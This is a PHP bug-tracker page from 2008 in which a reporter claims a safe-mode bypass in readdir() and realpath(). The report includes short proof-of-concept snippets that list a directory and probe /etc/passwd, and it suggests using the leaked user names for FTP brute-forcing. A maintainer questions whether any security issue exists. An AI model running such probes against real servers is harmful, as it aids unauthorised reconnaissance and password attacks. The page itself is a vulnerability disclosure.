php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #46831 safe mode bypass in readdir(), realpath()
Submitted: 2008-12-11 04:36 UTC Modified: 2008-12-24 01:00 UTC
Votes:3
Avg. Score:2.3 ± 0.9
Reproduced:0 of 1 (0.0%)
From: cmos_clr at hotmail dot com Assigned:
Status: No Feedback Package: Safe Mode/open_basedir
PHP Version: 5.2CVS-2008-12-11 (snap) OS: linux
Private report: No CVE-ID: None
Have you experienced this issue?
Rate the importance of this bug to you:

 [2008-12-11 04:36 UTC] cmos_clr at hotmail dot com
Description:
------------
::_::_::_::_::_::_::_::_::_::_::::_::_::_::_::_::_::_::_::_::_::::_::_::_::_::_::_::_::_::_::_::_:: 
::
::Found by  :  CmOs_CLR & hard_hakerz
::
::MAILS     :  CmOs_CLR@hotmail.com & hard_hakerz@hotmail.com
::
::SITE      :  wwW.SEC4EVER.coM
::
::-----------ABOUT Software:---------------- 
::
::VERSION   : PHP 5.2.6
::
::Vendor    : http://www.php.net
::
::------------------------------------------
::
::
::Responsible Functions : readdir() , realpath()
::
::WHERE IS THE PROBLEM ?
::
::IN SERVERS WITH SAFE MODE ON AND * getmyuid() * DISABLED WE CAN   ::BYPASS THIS.
::
::FIRST THIS ERROR WILL RESULT : getmyuid() has been disabled for ::security reasons.
::
::FOR readdir() :
::
::  
::  <?php
::  if ($handle = opendir('.')) {
::      while (false !== ($file = readdir($handle))) {
::          if ($file != "." && $file != "..") {
::              echo "$file\n";
::          }
::      }
::      closedir($handle);
::  }
::  ?>
::
::for realpath() :
::
::
::  <?php
::  echo realpath('/etc/passwd');
::  ?>
::
::THE RESULTAT IS :
:: The script whose *uid is 100* is not allowed to access /etc/passwd ::owned by uid 0 in 
:: /home/*user*/domains/site.com/public_html/function.php on line xx
::
::NOTE : a lot of others function can result this error "getmyuid() ::bypass "  un attacker can take a lot of information from this 
::error. like is the safe mode activat from http.conf or php.ini? the ::user of a site who? = user of ftp this can simplify a ftpbrute ::forcing only the case of pass because the user is known ......etc 
::this error is getmyuid() bypass in disabled fuction .
::
::
::thanks+good luck
::
::
::


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2008-12-16 18:58 UTC] iliaa@php.net
Where is the security issue, you get an appropriate error about access 
denied it would seem, no?
 [2008-12-24 01:00 UTC] php-bugs at lists dot php dot net
No feedback was provided for this bug for over a week, so it is
being suspended automatically. If you are able to provide the
information that was originally requested, please do so and change
the status of the bug back to "Open".
 
PHP Copyright © 2001-2018 The PHP Group
All rights reserved.
Last updated: Thu Dec 13 19:01:27 2018 UTC